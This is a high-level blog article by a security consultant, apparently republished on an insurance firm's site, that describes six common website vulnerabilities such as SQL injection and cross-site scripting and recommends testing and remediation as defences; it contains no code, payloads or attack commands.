Common website vulnerabilities you must defend against

This article is the fourth in a series about digital business security from information security consultant Kevin Beaver.
Arguably the most important aspects of any given network, website and web applications are a prime target for exploitation. Whether they’re hosted internally or in the cloud, web systems typically serve critical functions hosting sensitive information that your business likely can’t afford to have compromised. It doesn’t matter whether your websites or applications are developed in-house or by external parties, they all have the potential for security flaws that can lead to ill-gotten gains on the part of criminal hackers or others involved.

With the potential for literally hundreds of different web security exploits, most of them are predictable with many websites and applications being vulnerable to them at some point in their lifecycle. The following are common web exploits that you must find and properly defend against:
 

1. SQL injection

 
This is a type of input validation flaw that permits an attacker to run SQL database commands directly through vulnerable web pages and input parameters to gain direct database or operating system access.
 

2. Cross-site scripting

 
A similar input validation flaw which allows for client-side exploits that to manipulate user connections and facilitate things such as the spreading of malware and the reading of sensitive information inside a user’s web browser.
 

3. Weak authentication methods

 
These are flaws that allow attackers to run automated password cracking tools against the system, login with credentials stolen from other websites, or otherwise manipulate things to permit unauthorised logins or access to sensitive parts of the system. These flaws are often made worse through the absence of CAPTCHAs that require users to enter random characters in order to login.
 

4. Poor user session management

 
These are flaws that allow an attacker to interact with/take over a legitimate user’s web login session and provide the attacker access into the system.
 

5. Weak password reset function

 
This is a logic flaw that can be used to trick the system into permitting password resets legitimate without requiring further verification of the user.
 

6. Server misconfigurations

 
These are flaws that involve issues such as web server configurations and missing software patches that allow for remote exploitation – everything from obtaining a command prompt on the system to running denial of service attacks.
 

Every web environment is unique

 
These web security vulnerabilities are made worse by the fact that every web environment is unique. From developers to IT operations staff to security analysts, many people are involved. Given the complexity of the code as well as the underlying server and network infrastructure, web security concerns can make up a significant part of your overall security risk. Bring the human element into the equation and there’s a lot going on – and a lot to lose.

The important thing is to acknowledge these issues and then take reasonable steps to do something about them. The process goes as follows:
 

·    Know your environment, including all web systems associated with processing or storing sensitive business information.

·    Understand how it’s all at risk by performing proper vulnerability and penetration testing, source code analyses, and ensuring security is ingrained into your development and quality assurance processes.

·    Do something about the security issues identified by resolving known vulnerabilities and also applying compensating controls such as web application firewalls and multifactor authentication where necessary.

The secret to web security success is continual improvement. It won’t happen all at once or even in the near term. However, proper security practiced consistently over time by all those involved – both technical staff and management – will ensure that web security risks are properly mitigated long term.
 
About the author
 
Kevin Beaver, CISSP is an information security consultant, writer, and professional speaker with Atlanta, GA-based Principle Logic, LLC. With over 31 years in IT and 25 years in security, Kevin specializes in independent security assessments and virtual CISO consulting work to help businesses uncheck the boxes that keep creating a false sense of security. He has written 12 books on security including the best-selling Hacking For Dummies and The Practical Guide to HIPAA Privacy and Security Compliance. Kevin has written over 1,000 articles on security and regularly contributes to TechTarget's SearchSecurity.com, Ziff Davis' Toolbox.com, and Iron Mountain’s InfoGoTo.com. He has a bachelor’s in Computer Engineering Technology from Southern College of Technology and a master’s in Management of Technology from Georgia Tech. In his free time, Kevin races cars in the SCCA Spec Miata class and enjoys riding dirt bikes and snow skiing.
 
 
If you want to know more about how you can increase the revenue of your digital business by offering add-on insurance using state-of-the-art API technology, please contact us directly or book a time for us to call you, its free and there are no strings attached.
 
 
 

We will be happy to contact you at a time that suits you, for a free, no-obligation consultation.

 
 
Recommended Reading
Why security is so important for web APIs 21 January 2020
The difference between a web service and an API 07 January 2020
© PSA Insurance Solutions,
PSA Insurance Solutions Ltd Reg No: C83206 is a limited liability company under Maltese Law, having its registered address at: MIB building 53 Abate Rigord Street Ta’ Xbiex Malta, Tel + 356 22 58 34 92. The company is enrolled to act as an insurance agent in terms of the Insurance Intermediaries Act, 2006 by the Malta Financial Services Authority (MFSA), Notabile Road, Attard BKR 3000, Malta.